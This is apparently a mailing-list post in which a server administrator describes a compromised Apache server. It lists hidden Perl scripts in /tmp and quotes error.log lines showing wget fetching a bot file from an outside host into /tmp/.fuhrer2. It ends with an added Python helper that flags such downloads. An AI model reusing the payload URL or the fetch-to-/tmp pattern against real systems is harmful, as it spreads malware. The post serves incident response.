Here's what I found out after more digging in the logs.

There are 3 hidden files (attached with this message) in /tmp/:

1) .fuhrer
2) .fuhrer2
3) .fuhrer3

ns1:/var/log/apache2# ls -la /tmp/
total 56
drwxrwxrwt  5 root     root      4096 Nov 25 07:46 .
drwxr-xr-x 26 root     root      4096 Nov 25 04:49 ..
drwxrwxrwt  2 root     root      4096 Nov 21 23:32 .ICE-unix
drwxrwxrwt  2 root     root      4096 Nov 21 23:32 .X11-unix
-rw-r--r--  1 www-data www-data  3673 Nov 25 00:30 .fuhrer
-rw-r--r--  1 www-data www-data 18698 Nov 25 06:11 .fuhrer2
-rw-r--r--  1 www-data www-data     0 Nov 25 08:10 .fuhrer3
-rw-------  1 www-data www-data    71 Nov 23 03:28 sess_07f541a848d0dd70fc87c3aed1691c87
-rw-------  1 www-data www-data   864 Nov 23 01:55 sess_8092654d49176bb860dca7fad5f50cce
-rw-------  1 www-data www-data   342 Nov 22 23:56 sess_e5e56ebacf7fcd31ea42d829e1f1f4fd
drwxrwxrwx  3 www-data www-data  4096 Nov 23 01:28 yappa-ng_cache

All three are Perl scripts, so now it is clear that these are the Perl scripts which are running from within Apache (I've enabled mod_perl in my Apache installation) and eating up the CPU cycles.

Now let's look a little at /var/log/apache2/error.log:

Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                   100%  210.37 KB/s

08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]

--08:07:40--  http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                   100%  211.06 KB/s

08:07:40 (211.06 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]

--08:07:40--  http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
Resolving maple.phpwebhosting.com... 70.86.76.34
Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,698 [text/plain]

    0K .......... ........                                   100%  210.52 KB/s

The logs show that the guy uploaded the files to /tmp and hid them.

In my first mail, the logs showed a lot of "sh" defunct processes executed from within Apache. Is this an attempt to gain a shell through the web server?

Please suggest what more I should look for and how to tackle this attack.

Regards,
rrs

-- 
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is research."
"Necessity is the mother of invention."
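A defender-side triage snippet, added here and not part of Ritesh's mail: it parses the wget output that Apache's error.log captured above into download records and flags dot-files written into /tmp or another world-writable directory, which is exactly the pattern the listing shows. The sample log is constructed from the lines quoted in the mail; the second, benign download to /var/www is invented for contrast.

```python
# Added triage helper: pair wget's `--HH:MM:SS-- URL`, `=> `dest'` and
# `saved [got/total]` lines found in an Apache error.log into download records,
# then flag dot-files written to world-writable directories, as seen in the mail.
import re
from dataclasses import dataclass
# Constructed sample, modelled on the wget output quoted in the mail.
SAMPLE_LOG = """\
--08:07:40--  http://maple.phpwebhosting.com/%7Edarkbroked/linuxdaybot.txt
           => `/tmp/.fuhrer2'
08:07:40 (210.37 KB/s) - `/tmp/.fuhrer2' saved [18698/18698]
--08:09:02--  http://mirror.invalid/readme.txt
           => `/var/www/readme.txt'
08:09:02 (5.00 KB/s) - `/var/www/readme.txt' saved [120/120]
"""

START_RE = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
DEST_RE = re.compile(r"=>\s+`([^']+)'")
SAVED_RE = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")  # writable by www-data too

@dataclass
class Download:
    time: str
    url: str
    dest: str
    size: int

    def suspicious(self) -> bool:
        # A dot-file dropped into a world-writable directory, like /tmp/.fuhrer2.
        name = self.dest.rsplit("/", 1)[-1]
        return self.dest.startswith(WORLD_WRITABLE) and name.startswith(".")

def parse_wget_downloads(log: str) -> list:
    # Completed downloads in log order; partial transfers are skipped.
    done, cur = [], None
    for line in log.splitlines():
        if m := START_RE.match(line):
            cur = Download(m.group(1), m.group(2), "", 0)
        elif (m := DEST_RE.search(line)) and cur:
            cur.dest = m.group(1)
        elif (m := SAVED_RE.search(line)) and cur and m.group(1) == cur.dest:
            if m.group(2) == m.group(3):  # got == total: transfer completed
                cur.size = int(m.group(2))
                done.append(cur)
            cur = None
    return done

def suspicious_downloads(log: str) -> list:
    return [d for d in parse_wget_downloads(log) if d.suspicious()]
```

Run it over the real error.log with `suspicious_downloads(open("/var/log/apache2/error.log").read())`; each hit gives the fetching URL, the drop path and the byte count to compare against the files in /tmp.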